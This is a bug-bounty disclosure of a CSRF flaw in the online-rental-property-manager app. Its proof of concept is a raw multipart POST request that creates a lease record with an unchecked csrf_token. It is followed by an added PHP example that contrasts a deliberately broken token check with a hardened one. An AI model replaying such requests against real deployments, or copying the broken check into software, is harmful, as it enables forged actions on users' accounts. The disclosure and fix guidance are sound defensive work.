Cross-Site Request Forgery (CSRF) in bigprof-software/online-rental-property-manager

Valid
Reported on Aug 4th 2021

✍️ Description

CSRF bug in application

🕵️‍♂️ Proof of Concept

The request below is vulnerable to a CSRF attack.
Although the request carries a csrf_token field, the server never checks it: any attacker-provided CSRF token is accepted.

POST /online-rental/app/applications_leases_view.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------216599666334118809003157769131
Content-Length: 4431
Origin: http://localhost
Connection: close
Referer: http://localhost/online-rental/app/applications_leases_view.php
Cookie: 
Upgrade-Insecure-Requests: 1

-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="csrf_token"

5d62bcb310fa995fc05c34fdf04f4312
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="current_view"

DV
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="SortField"


-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="SelectedID"


-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="SelectedField"


-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="SortDirection"


-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="FirstRecord"

1
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="NoDV"


-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="PrintDV"


-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="DisplayRecords"

all
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="tenants"

1
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="status"

Application
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="property"


-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="unit"


-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="type"

Fixed
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="total_number_of_occupants"


-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="start_dateMonth"

7
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="start_dateDay"

5
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="start_dateYear"

2021
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="end_dateMonth"

7
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="end_dateDay"

5
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="end_dateYear"

2021
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="recurring_charges_frequency"

Monthly
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="next_due_dateMonth"

7
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="next_due_dateDay"

5
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="next_due_dateYear"

2021
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="rent"


-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="security_deposit"


-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="security_deposit_dateMonth"


-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="security_deposit_dateDay"


-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="security_deposit_dateYear"


-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="emergency_contact"


-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="co_signer_details"


-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="notes"

<br>
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="insert_x"

1
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="SearchString"


-----------------------------216599666334118809003157769131--
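
Added example (not part of this report or the project's code): the pattern the report describes, a csrf_token field that is emitted in the form but never compared server-side, shown next to a hardened PHP handler that binds the token to the session and compares it in constant time. The function names and the session key are assumptions.

```php
<?php
// Added example, not the project's code. Function names and the
// $_SESSION['csrf_token'] key are assumptions.
session_start();

// Issue one unpredictable token per session and embed it in every form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Vulnerable pattern from the report: the field exists in the POST body,
// but its value is never compared with anything, so any value passes.
function csrf_check_broken(array $post): bool {
    return isset($post['csrf_token']);   // presence only, value ignored
}

// Hardened check: the submitted token must equal the session token,
// compared with hash_equals() to avoid timing leaks.
function csrf_check(array $post): bool {
    if (empty($_SESSION['csrf_token']) || !isset($post['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token']);
}

// Handler for a state-changing submission (the report's request sends
// insert_x=1 to create a lease record): refuse it when the check fails.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['insert_x'])) {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // ... create the lease record ...
}
?>
<form method="post" enctype="multipart/form-data">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="submit" name="insert_x" value="1">
</form>
```

With csrf_check_broken() a cross-origin form post with an arbitrary csrf_token value is accepted; with csrf_check() it is rejected with 403 because the attacker cannot read the victim's session token.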


💥 Impact

CSRF bug

We have contacted a member of the bigprof-software/online-rental-property-manager team and are waiting to hear back a month ago
BigProf Software confirmed that a fix has been merged on f45953 2 days ago
BigProf Software has been awarded the fix bounty
$6.25